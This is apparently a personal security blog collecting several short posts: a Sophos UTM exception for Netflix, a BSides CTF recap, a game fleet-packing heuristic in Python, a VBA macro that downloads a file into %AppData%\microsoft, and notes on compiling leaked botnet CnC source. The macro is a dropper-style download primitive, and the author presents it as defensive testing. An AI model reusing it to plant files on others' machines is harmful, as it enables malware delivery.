*** This solution no longer works with updates that Sophos has applied or changes that Netflix has made!
I was helping a friend with a Sophos UTM and found that Netflix would not stream on their mobile devices. We went into the settings and, by studying the web log and how Netflix URLs are put together, created the following regex to add an exception so the AV would not scan the URL:
Below is a screenshot of the exception that was created:
Now, as long as the bot masters do not create a bot that uses that regex to exfiltrate data, it will work great! Oh, by the way, the Sophos UTM is free for home use. It is a nice Unified Threat Management (UTM) appliance for home use and is a lot better than a router you can buy off the shelf.
At BSides 2016 I participated in their Hackers Challenge. The challenges were based on reverse engineering, network packet analysis, and many other puzzles that you needed to figure out. When I hit the wall at 3 AM on March 11th I was in 2nd place. By the end of the competition, which was at 10 AM, I had dropped to 7th. The challenge was great! Thanks BSides...
Check out the django.nV project. This is a project that was used in the Hackers Challenge but was adapted from its original state.
Screenshot of being in 2nd place at 3AM.
Screenshot of being in 7th place at the end of the competition.
One thing to note is that most of the challenges were worth 4,000 points in the beginning. If you completed the challenge and no one else did, you kept the 4,000 points. For each other participant who accomplished the challenge, you had to divide the points with them.
On the side I have been playing a game created by Kixeye called Vega Conflict. Their description of the game is below:
Stake your claim, command your fleets, and wage epic war in space. Band together with other players in a bloody rebellion to take back the galaxy from the evil VEGA Federation. CUSTOMIZE YOUR WAR: Different targets call for different strategy, outfit your fleet for victory. REAL-TIME PvP: Real war doesn’t wait its turn - attack enemies at will in real-time. BATTLE ANYWHERE: Conflict never ends. Continue your progress on phone, tablet, or in browser.
In the game you progress by leveling the buildings on your planet. Currently I have a level 7 Fleet Bay, which allows a maximum of 7 Fleets. Each Fleet can only have a total mass of 10,100. The difficulty is taking all of the ships you have built and forming 7 Fleets, each as close to the maximum mass as you can get. A note on strategy: The best strategy is …
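The fleet-building problem above is a bin-packing instance: a fixed number of fleets, a mass cap per fleet, and a hangar of ships to distribute. The following is an added example (not from the post or the game) that applies a first-fit-decreasing heuristic to it; the ship names and masses are constructed for illustration.

```python
"""Pack ships into fleets under a per-fleet mass cap (first-fit-decreasing).
Added example; ship masses below are constructed, not taken from the game."""
from typing import Dict, List, Tuple

FLEET_CAP = 10_100   # maximum mass per fleet, as stated in the post
MAX_FLEETS = 7       # a level 7 Fleet Bay allows 7 fleets

# Constructed sample hangar: ship name -> mass.
SHIPS: Dict[str, int] = {
    "Ranger-1": 1350, "Ranger-2": 1350, "Ranger-3": 1350,
    "Longbow-1": 2600, "Longbow-2": 2600, "Longbow-3": 2600,
    "Genesis-1": 3900, "Genesis-2": 3900,
    "Zeal-1": 5200, "Zeal-2": 5200, "Zeal-3": 5200,
    "Vindicator-1": 7800, "Vindicator-2": 7800,
    "Dreadnought-1": 9900,
}


def pack_fleets(ships: Dict[str, int], cap: int = FLEET_CAP,
                fleets: int = MAX_FLEETS) -> Tuple[List[List[str]], List[str]]:
    """First-fit-decreasing: place the heaviest ship first, each into the
    first fleet that still has room. Returns (fleets, unassigned ships)."""
    if any(m <= 0 for m in ships.values()):
        raise ValueError("ship mass must be positive")
    bins: List[List[str]] = [[] for _ in range(fleets)]
    load = [0] * fleets
    unassigned: List[str] = []
    # Sort by mass descending, then by name, so the result is deterministic.
    for name, mass in sorted(ships.items(), key=lambda kv: (-kv[1], kv[0])):
        for i in range(fleets):
            if load[i] + mass <= cap:
                bins[i].append(name)
                load[i] += mass
                break
        else:  # no fleet has room, or the ship alone exceeds the cap
            unassigned.append(name)
    return bins, unassigned


def fleet_mass(fleet: List[str], ships: Dict[str, int]) -> int:
    """Total mass of one fleet."""
    return sum(ships[n] for n in fleet)


if __name__ == "__main__":
    fleets, left = pack_fleets(SHIPS)
    for i, f in enumerate(fleets, 1):
        print(f"Fleet {i}: {fleet_mass(f, SHIPS):>6}/{FLEET_CAP}  {f}")
    print("Unassigned:", left)
```

First-fit-decreasing is a heuristic, not an optimal solver: it can leave a light ship unassigned even when a different arrangement would fit everything, so the unassigned list is worth checking.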
Below is a Visual Basic for Applications script I quickly built to download a file to the computer through a macro. This was to test whether it could be done and to find a way to prevent it from occurring.
```vba
' vTest Macro: fetch a file over HTTP and write it under %AppData%.
Sub vTest()
    Dim dURL As String
    dURL = "http://blah/text.zip"          ' placeholder URL from the original post
    Dim WinHttpReq As Object
    Dim oStream As Object
    Dim fileName As String
    fileName = Environ("AppData") & "\microsoft\text.zip"
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", dURL, False     ' synchronous, so Status is valid after send
    WinHttpReq.send
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1                   ' adTypeBinary
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile fileName, 2     ' adSaveCreateOverWrite
        oStream.Close
    End If
End Sub
```
Using the information gathered from the binaries, I began searching Google for unique strings. One of the unique strings I searched for was "HTTPFLOOD GHP". This returned fewer than 10 results, and the first one was from the site hxxp://psbdmp.com/wT1htV9b. It contained the source code for what they called "Palkia Server.c".
This particular piece of source code was leaked on 2016-11-12 09:58:05 according to the timestamp on the paste. I have not validated that the binary in which I found the string matches this particular CnC server source code.
After reading the source code to understand its logic and verifying that it contained no backdoors or other attempts to infect my systems, I compiled it on a temporary server. On execution you must specify the port on which it listens for bot connections and the number of threads it will use.
After you specify the port and the number of threads it begins to …